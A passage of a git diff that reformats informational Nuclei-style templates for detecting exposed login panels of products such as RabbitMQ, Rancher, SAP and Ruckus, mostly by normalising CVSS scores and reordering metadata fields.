CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/qualtrics-login.yaml b/http/exposed-panels/qualtrics-login.yaml index af7f8d3d6e..b59c0ab264 100644 --- a/http/exposed-panels/qualtrics-login.yaml +++ b/http/exposed-panels/qualtrics-login.yaml @@ -7,11 +7,11 @@ info: description: Qualtrics login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,qualtrics http: diff --git a/http/exposed-panels/quantum-scalar-detect.yaml b/http/exposed-panels/quantum-scalar-detect.yaml index 132ed8dfb9..4c77f8ad19 100644 --- a/http/exposed-panels/quantum-scalar-detect.yaml +++ b/http/exposed-panels/quantum-scalar-detect.yaml @@ -7,11 +7,11 @@ info: description: Quantum Scalar i500 login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,quantum,scalar metadata: max-request: 1 + tags: panel,quantum,scalar http: - method: GET diff --git a/http/exposed-panels/r-webserver-login.yaml b/http/exposed-panels/r-webserver-login.yaml index a989774acf..2f31310aac 100644 --- a/http/exposed-panels/r-webserver-login.yaml +++ b/http/exposed-panels/r-webserver-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/7132 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: edb,panel,rwebserver metadata: max-request: 1 + tags: edb,panel,rwebserver http: - method: GET diff --git a/http/exposed-panels/rabbitmq-dashboard.yaml b/http/exposed-panels/rabbitmq-dashboard.yaml index 5c393130bf..8008fe9591 100644 --- a/http/exposed-panels/rabbitmq-dashboard.yaml +++ b/http/exposed-panels/rabbitmq-dashboard.yaml @@ -7,16 +7,17 @@ info: description: RabbitMQ Management panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,rabbitmq metadata: max-request: 1 + tags: panel,rabbitmq http: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: diff --git a/http/exposed-panels/racksnet-login.yaml b/http/exposed-panels/racksnet-login.yaml index b3ae21705e..dfa84500c8 100644 --- a/http/exposed-panels/racksnet-login.yaml +++ b/http/exposed-panels/racksnet-login.yaml @@ -10,7 +10,7 @@ info: - https://racksnet.com/en/product-overview/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/radius-manager.yaml b/http/exposed-panels/radius-manager.yaml index 9c895091ac..f92723a2f3 100644 --- a/http/exposed-panels/radius-manager.yaml +++ b/http/exposed-panels/radius-manager.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6790 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,radius,edb metadata: max-request: 4 + tags: panel,radius,edb http: - method: GET @@ -28,6 +28,7 @@ http: - type: word words: - 'Radius Manager - User Control Panel' + - type: status status: - 200 diff --git a/http/exposed-panels/rancher-dashboard.yaml b/http/exposed-panels/rancher-dashboard.yaml index 20a135018a..0d13278c77 100644 --- a/http/exposed-panels/rancher-dashboard.yaml +++ b/http/exposed-panels/rancher-dashboard.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: "true" max-request: 2 shodan-query: http.favicon.hash:-1324930554 - verified: "true" tags: panel,rancher,dashboard,login http: @@ -25,6 +25,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/rancher-panel.yaml b/http/exposed-panels/rancher-panel.yaml index 0513d13c21..e8a6c9a352 100644 --- a/http/exposed-panels/rancher-panel.yaml +++ b/http/exposed-panels/rancher-panel.yaml @@ -10,11 +10,11 @@ info: - https://rancher.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:464587962 tags: panel,rancher,kubernetes,devops,cloud,login diff --git a/http/exposed-panels/raspberrymatic-panel.yaml b/http/exposed-panels/raspberrymatic-panel.yaml index f860ede978..7d5358927f 100644 --- a/http/exposed-panels/raspberrymatic-panel.yaml +++ b/http/exposed-panels/raspberrymatic-panel.yaml @@ -7,7 +7,7 @@ info: description: RaspberryMatic login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/red-lion-panel.yaml b/http/exposed-panels/red-lion-panel.yaml index f78de8e303..340a568a2a 100644 --- a/http/exposed-panels/red-lion-panel.yaml +++ b/http/exposed-panels/red-lion-panel.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: info metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,redlion,detect,iot http: diff --git a/http/exposed-panels/redash-panel.yaml b/http/exposed-panels/redash-panel.yaml index 81428cdd2a..f98ee63345 100644 --- a/http/exposed-panels/redash-panel.yaml +++ b/http/exposed-panels/redash-panel.yaml @@ -7,7 +7,7 @@ info: description: Redash login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/redhat/redhat-satellite-panel.yaml b/http/exposed-panels/redhat/redhat-satellite-panel.yaml index 640525f440..ca60fcb4f3 100644 --- a/http/exposed-panels/redhat/redhat-satellite-panel.yaml +++ b/http/exposed-panels/redhat/redhat-satellite-panel.yaml @@ -6,11 +6,11 @@ info: severity: info classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"redhat" "Satellite" tags: panel,redhat,satellite @@ -21,7 +21,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/redis-commander-exposure.yaml b/http/exposed-panels/redis-commander-exposure.yaml index 5a69efd9c9..bb7a8fbc8b 100644 --- a/http/exposed-panels/redis-commander-exposure.yaml +++ b/http/exposed-panels/redis-commander-exposure.yaml @@ -5,16 +5,16 @@ info: author: dahse89 severity: info description: Redis Commander panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://joeferner.github.io/redis-commander/ - https://github.com/joeferner/redis-commander - tags: panel,redis + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 + tags: panel,redis http: - method: GET diff --git a/http/exposed-panels/redis-enterprise-panel.yaml b/http/exposed-panels/redis-enterprise-panel.yaml index fa0887857e..e5d7ae2bf2 100644 --- a/http/exposed-panels/redis-enterprise-panel.yaml +++ b/http/exposed-panels/redis-enterprise-panel.yaml @@ -5,8 +5,8 @@ info: author: tess severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Enterprise-Class Redis for Developers" tags: panel,redis,enterprise diff --git a/http/exposed-panels/remedy-axis-login.yaml b/http/exposed-panels/remedy-axis-login.yaml index 7ba092640b..e84ae7e5f4 100644 --- a/http/exposed-panels/remedy-axis-login.yaml +++ b/http/exposed-panels/remedy-axis-login.yaml @@ -6,12 +6,12 @@ info: severity: info classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: + verified: true max-request: 3 shodan-query: http.html:"BMC Remedy" - verified: true tags: panel,remedy,bmc http: diff --git a/http/exposed-panels/remkon-manager-panel.yaml b/http/exposed-panels/remkon-manager-panel.yaml index 64e443be0f..36aa13fbc2 100644 --- a/http/exposed-panels/remkon-manager-panel.yaml +++ b/http/exposed-panels/remkon-manager-panel.yaml @@ -7,7 +7,7 @@ info: description: RemKon Device Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/remote-ui-login.yaml b/http/exposed-panels/remote-ui-login.yaml index 49478f7ac8..7d96f32fad 100644 --- a/http/exposed-panels/remote-ui-login.yaml +++ b/http/exposed-panels/remote-ui-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6815 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,edb metadata: max-request: 1 + tags: panel,edb http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'System Manager ID:' + - type: status status: - 200 diff --git a/http/exposed-panels/repetier-server-panel.yaml b/http/exposed-panels/repetier-server-panel.yaml index 9eb7c10914..318f1993e8 100644 --- a/http/exposed-panels/repetier-server-panel.yaml +++ b/http/exposed-panels/repetier-server-panel.yaml @@ -7,8 +7,8 @@ info: description: | Repetier Server login panel detected. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Repetier-Server" tags: panel,repetier,detect diff --git a/http/exposed-panels/residential-gateway-login.yaml b/http/exposed-panels/residential-gateway-login.yaml index a3eca73e3f..16b059876e 100644 --- a/http/exposed-panels/residential-gateway-login.yaml +++ b/http/exposed-panels/residential-gateway-login.yaml @@ -7,7 +7,7 @@ info: description: Residential Gateway login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 2 @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/retool-login.yaml b/http/exposed-panels/retool-login.yaml index 1a8bc8b37f..aaaf27d2f5 100644 --- a/http/exposed-panels/retool-login.yaml +++ b/http/exposed-panels/retool-login.yaml @@ -7,11 +7,11 @@ info: description: Retool login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Retool" tags: login,panel,retool diff --git a/http/exposed-panels/riseup-panel.yaml b/http/exposed-panels/riseup-panel.yaml index b185625137..a2f0972ce4 100644 --- a/http/exposed-panels/riseup-panel.yaml +++ b/http/exposed-panels/riseup-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.riseup.ai/en/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,riseup http: diff --git a/http/exposed-panels/rocketmq-console-exposure.yaml b/http/exposed-panels/rocketmq-console-exposure.yaml index 74937a4d09..42b2610619 100644 --- a/http/exposed-panels/rocketmq-console-exposure.yaml +++ b/http/exposed-panels/rocketmq-console-exposure.yaml @@ -7,11 +7,11 @@ info: description: Apache RocketMQ Console panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"RocketMq-console-ng" tags: panel,apache diff --git a/http/exposed-panels/room-alert-detect.yaml b/http/exposed-panels/room-alert-detect.yaml index 9a8d00781d..08ac19c1e1 100644 --- a/http/exposed-panels/room-alert-detect.yaml +++ b/http/exposed-panels/room-alert-detect.yaml @@ -9,11 +9,11 @@ info: - https://avtech.com/articles/166/how-to-access-a-room-alert-monitors-settings-pages-2/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Room Alert" tags: panel,room-alert,avtech @@ -24,6 +24,7 @@ http: - "{{BaseURL}}/gateway" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/roxy-fileman.yaml b/http/exposed-panels/roxy-fileman.yaml index 82d10a5dec..1fe0525741 100644 --- a/http/exposed-panels/roxy-fileman.yaml +++ b/http/exposed-panels/roxy-fileman.yaml @@ -3,15 +3,15 @@ id: roxy-fileman info: name: Roxy File Manager - Panel Detect author: liquidsec,DhiyaneshDk - description: Roxy File Manager panel was detected. severity: info + description: Roxy File Manager panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 4 verified: true + max-request: 4 google-query: intitle:"Roxy file manager" tags: tech,roxy,fileman,panel @@ -26,6 +26,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/royalevent-management-panel.yaml b/http/exposed-panels/royalevent-management-panel.yaml index d3fd66b82f..328933f948 100644 --- a/http/exposed-panels/royalevent-management-panel.yaml +++ b/http/exposed-panels/royalevent-management-panel.yaml @@ -7,11 +7,11 @@ info: description: Royal Event Management System admin panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 tags: royalevent,panel http: @@ -21,7 +21,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/rsa-self-service.yaml b/http/exposed-panels/rsa-self-service.yaml index c5d6e96c2a..72f0cedc0e 100644 --- a/http/exposed-panels/rsa-self-service.yaml +++ b/http/exposed-panels/rsa-self-service.yaml @@ -7,16 +7,17 @@ info: description: RSA Self-Service login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,rsa metadata: max-request: 1 + tags: panel,rsa http: - method: GET path: - "{{BaseURL}}/console-selfservice/SelfService.do" + matchers-condition: and matchers: - type: word @@ -27,6 +28,7 @@ http: - "AM_Self_Service_Console" - "console-selfservice" condition: and + - type: status status: - 200 diff --git a/http/exposed-panels/rstudio-detect.yaml b/http/exposed-panels/rstudio-detect.yaml index 20d2158bef..8411db13bf 100644 --- a/http/exposed-panels/rstudio-detect.yaml +++ b/http/exposed-panels/rstudio-detect.yaml @@ -7,22 +7,24 @@ info: description: RStudio panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,rstudio metadata: max-request: 1 + tags: panel,rstudio http: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - 'RStudio' part: header + - type: status status: - 302 diff --git a/http/exposed-panels/ruckus-unleashed-panel.yaml b/http/exposed-panels/ruckus-unleashed-panel.yaml index 6c0cecc3e7..4329fa0ab1 100644 --- a/http/exposed-panels/ruckus-unleashed-panel.yaml +++ b/http/exposed-panels/ruckus-unleashed-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.commscope.com/ruckus/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/ruckus-wireless-admin-login.yaml b/http/exposed-panels/ruckus-wireless-admin-login.yaml index cb7b85a98c..afbe4dcfdf 100644 --- a/http/exposed-panels/ruckus-wireless-admin-login.yaml +++ b/http/exposed-panels/ruckus-wireless-admin-login.yaml @@ -1,4 +1,5 @@ id: ruckus-wireless-admin-login + info: name: Ruckus Wireless Admin Login Panel - Detect author: pussycat0x @@ -6,11 +7,11 @@ info: description: Ruckus Wireless admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"ruckus" tags: panel,exposed,ruckus diff --git a/http/exposed-panels/ruijie/rg-uac-panel.yaml b/http/exposed-panels/ruijie/rg-uac-panel.yaml index c47506c39b..5c2c23a8cd 100644 --- a/http/exposed-panels/ruijie/rg-uac-panel.yaml +++ b/http/exposed-panels/ruijie/rg-uac-panel.yaml @@ -7,7 +7,7 @@ info: description: Ruijie RG-UAC login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/rundeck-login.yaml b/http/exposed-panels/rundeck-login.yaml index 9916a96b0b..ad481c8500 100644 --- a/http/exposed-panels/rundeck-login.yaml +++ b/http/exposed-panels/rundeck-login.yaml @@ -7,11 +7,11 @@ info: description: Rundeck login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Rundeck" tags: panel,rundeck @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/rustici-content-controller.yaml b/http/exposed-panels/rustici-content-controller.yaml index 2b6ce4a3d0..5579701211 100644 --- a/http/exposed-panels/rustici-content-controller.yaml +++ b/http/exposed-panels/rustici-content-controller.yaml @@ -7,11 +7,11 @@ info: description: Rustici Content Controller panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Rustici Content Controller" tags: panel,rustici @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/saferoads-vms-login.yaml b/http/exposed-panels/saferoads-vms-login.yaml index 3f19adaba9..b577d9b3c2 100644 --- a/http/exposed-panels/saferoads-vms-login.yaml +++ b/http/exposed-panels/saferoads-vms-login.yaml @@ -9,16 +9,17 @@ info: - https://www.exploit-db.com/ghdb/6941 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,edb metadata: max-request: 1 + tags: panel,edb http: - method: GET path: - '{{BaseURL}}/login.html' + matchers: - type: word words: diff --git a/http/exposed-panels/sage-panel.yaml b/http/exposed-panels/sage-panel.yaml index a8336a1a3e..540eb05c64 100644 --- a/http/exposed-panels/sage-panel.yaml +++ b/http/exposed-panels/sage-panel.yaml @@ -7,7 +7,7 @@ info: description: Sage X3 login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/saltgui-panel.yaml b/http/exposed-panels/saltgui-panel.yaml index 4b099b36e4..a359f549e4 100644 --- a/http/exposed-panels/saltgui-panel.yaml +++ b/http/exposed-panels/saltgui-panel.yaml @@ -7,11 +7,11 @@ info: description: SaltGUI login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,saltgui metadata: max-request: 1 + tags: panel,saltgui http: - method: GET @@ -21,6 +21,7 @@ http: unsafe: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/saltstack-config-panel.yaml b/http/exposed-panels/saltstack-config-panel.yaml index 7ad407d987..780b4f97a1 100644 --- a/http/exposed-panels/saltstack-config-panel.yaml +++ b/http/exposed-panels/saltstack-config-panel.yaml @@ -8,11 +8,11 @@ info: SaltStack config panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"SaltStack Config" tags: panel,vmware,login,saltstack diff --git a/http/exposed-panels/samba-swat-panel.yaml b/http/exposed-panels/samba-swat-panel.yaml index d66ef769e9..22c39e09a7 100644 --- a/http/exposed-panels/samba-swat-panel.yaml +++ b/http/exposed-panels/samba-swat-panel.yaml @@ -7,11 +7,11 @@ info: description: Samba SWAT panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,samba metadata: max-request: 1 + tags: panel,samba http: - method: GET diff --git a/http/exposed-panels/samsung-printer-detect.yaml b/http/exposed-panels/samsung-printer-detect.yaml index 02454529b5..bca1a17a53 100644 --- a/http/exposed-panels/samsung-printer-detect.yaml +++ b/http/exposed-panels/samsung-printer-detect.yaml @@ -7,7 +7,7 @@ info: description: Samsung printer panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/sap-cloud-analytics.yaml b/http/exposed-panels/sap-cloud-analytics.yaml index 56d2c79501..d1b43c23b2 100644 --- a/http/exposed-panels/sap-cloud-analytics.yaml +++ b/http/exposed-panels/sap-cloud-analytics.yaml @@ -7,11 +7,11 @@ info: description: SAP Analytics Cloud panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"SAP Analytics Cloud" tags: panel,sap,cloudanalytics @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/sap-hana-xsengine-panel.yaml b/http/exposed-panels/sap-hana-xsengine-panel.yaml index d7c8be4f8e..5cd6560460 100644 --- a/http/exposed-panels/sap-hana-xsengine-panel.yaml +++ b/http/exposed-panels/sap-hana-xsengine-panel.yaml @@ -7,16 +7,17 @@ info: description: SAP HANA XS Engine admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,sap metadata: max-request: 1 + tags: panel,sap http: - method: GET path: - "{{BaseURL}}/sap/hana/xs/formLogin/login.html" + host-redirects: true matchers: - type: word diff --git a/http/exposed-panels/sap-netweaver-portal.yaml b/http/exposed-panels/sap-netweaver-portal.yaml index 2bd784c0ff..643572e769 100644 --- a/http/exposed-panels/sap-netweaver-portal.yaml +++ b/http/exposed-panels/sap-netweaver-portal.yaml @@ -10,16 +10,17 @@ info: - https://www.cisoplatform.com/profiles/blogs/sap-netweaver-abap-security-configuration-part-2-default classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,sap metadata: max-request: 1 + tags: panel,sap http: - method: GET path: - "{{BaseURL}}/irj/portal" + matchers: - type: word words: diff --git a/http/exposed-panels/sap-successfactors-detect.yaml b/http/exposed-panels/sap-successfactors-detect.yaml index c1a75386b9..a2729167ac 100644 --- a/http/exposed-panels/sap-successfactors-detect.yaml +++ b/http/exposed-panels/sap-successfactors-detect.yaml @@ -7,11 +7,11 @@ info: description: SAP SuccessFactors login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Login - SAP SuccessFactors" tags: sap,detect @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/sapfiori-panel.yaml b/http/exposed-panels/sapfiori-panel.yaml index 1749c9a990..2c4fce760e 100644 --- a/http/exposed-panels/sapfiori-panel.yaml +++ b/http/exposed-panels/sapfiori-panel.yaml @@ -7,11 +7,11 @@ info: description: SAP Fiori login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,sap,fiori metadata: max-request: 2 + tags: panel,sap,fiori http: - method: GET diff --git a/http/exposed-panels/sas-login-panel.yaml b/http/exposed-panels/sas-login-panel.yaml index cbc7924f9b..cd3e7867e6 100644 --- a/http/exposed-panels/sas-login-panel.yaml +++ b/http/exposed-panels/sas-login-panel.yaml @@ -7,11 +7,11 @@ info: description: SAS login panel has been detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:957255151 tags: sas,panel @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word words: - "SAS® Logon Manager" diff --git a/http/exposed-panels/satis-repository.yaml b/http/exposed-panels/satis-repository.yaml index 62d21190f5..cc4852e202 100644 --- a/http/exposed-panels/satis-repository.yaml +++ b/http/exposed-panels/satis-repository.yaml @@ -5,16 +5,16 @@ info: author: FlorianMaak severity: info description: | - Satis composer repository was detected + Satis composer repository was detected reference: - https://github.com/composer/satis classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Satis" tags: exposure,composer,satis diff --git a/http/exposed-panels/sauter-login.yaml b/http/exposed-panels/sauter-login.yaml index ba079a9c78..09f4d25566 100644 --- a/http/exposed-panels/sauter-login.yaml +++ b/http/exposed-panels/sauter-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6883 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,sauter,edb metadata: max-request: 1 + tags: panel,sauter,edb http: - method: GET diff --git a/http/exposed-panels/sauter-moduwebvision-panel.yaml b/http/exposed-panels/sauter-moduwebvision-panel.yaml index 9d07606940..58c7ba627c 100644 --- a/http/exposed-panels/sauter-moduwebvision-panel.yaml +++ b/http/exposed-panels/sauter-moduwebvision-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.sauter-controls.com metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1663319756 tags: panel,moduweb,sauter,login @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/scriptcase/scriptcase-panel.yaml b/http/exposed-panels/scriptcase/scriptcase-panel.yaml index 564974f9ac..5a0e082cfc 100644 --- a/http/exposed-panels/scriptcase/scriptcase-panel.yaml +++ b/http/exposed-panels/scriptcase/scriptcase-panel.yaml @@ -8,8 +8,8 @@ info: - https://www.scriptcase.com.br - https://www.scriptcase.net metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"ScriptCase" tags: panel,scriptcase @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/scriptcase/devel/iface/" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml b/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml index 